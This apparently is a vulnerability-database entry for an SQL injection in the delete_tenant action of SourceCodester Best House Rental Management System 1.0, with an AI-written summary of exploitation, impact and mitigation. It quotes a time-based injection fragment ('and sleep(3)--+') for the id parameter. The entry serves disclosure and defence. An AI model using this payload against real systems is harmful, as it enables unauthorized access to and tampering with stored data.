SourceCodester Best House Rental Management System ajax.php delete_tenant sql injection
Description
A vulnerability was found in SourceCodester Best House Rental Management System 1.0 and classified as critical. Affected by this issue is the function delete_tenant of the file /ajax.php?action=delete_tenant. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SourceCodester Best House Rental Management System 1.0 is vulnerable to SQL injection via the `id` parameter in `delete_tenant` function in `/ajax.php`, allowing remote unauthenticated attackers to execute arbitrary SQL commands.
Vulnerability
A critical SQL injection vulnerability exists in SourceCodester Best House Rental Management System version 1.0. The flaw is located in the delete_tenant function within the file /ajax.php?action=delete_tenant. The application fails to properly sanitize the id POST parameter before using it in a SQL query, allowing an attacker to inject arbitrary SQL commands. No authentication or special privileges are required to reach this endpoint as it is accessible to any remote visitor [1].
Exploitation
An attacker can exploit this vulnerability by sending a crafted POST request to /ajax.php?action=delete_tenant with a malicious id parameter. The public proof of concept demonstrates the injection by appending and sleep(3)--+ to the id value, causing a time delay confirming SQL execution. The attack can be launched remotely over the network without any prior authentication or user interaction. The public PoC shows the request includes standard HTTP headers and a session cookie, but the session is not required for the injection to succeed—any unauthenticated visitor can perform the attack [1].
Impact
Successful exploitation allows an attacker to extract, modify, or delete arbitrary data from the database. This can lead to complete compromise of the application's data confidentiality, integrity, and availability. An attacker may be able to retrieve sensitive user information, credentials, or other stored data, and potentially escalate privileges or gain administrative access to the system. Given the critical severity (CVSS score not specified in sources but described as critical), the impact is severe and could lead to full system takeover [1].
Mitigation
As of the publication date (2024-10-24), no official patch or fixed version has been released by SourceCodester. The vendor's website (sourcecodester.com) does not provide an update or advisory for this vulnerability [2]. Users of Best House Rental Management System 1.0 are advised to implement input validation and parameterized queries for the id parameter in the delete_tenant function as a temporary workaround until a patch becomes available. The vulnerability is not currently listed on the CISA Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: = 1.0
- Range: 1.0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
5- github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/house-rentalmanagement-system1.mdmitreexploit
- vuldb.commitrethird-party-advisory
- vuldb.commitresignaturepermissions-required
- vuldb.commitrevdb-entrytechnical-description
- www.sourcecodester.commitreproduct
News mentions
0No linked articles in our index yet.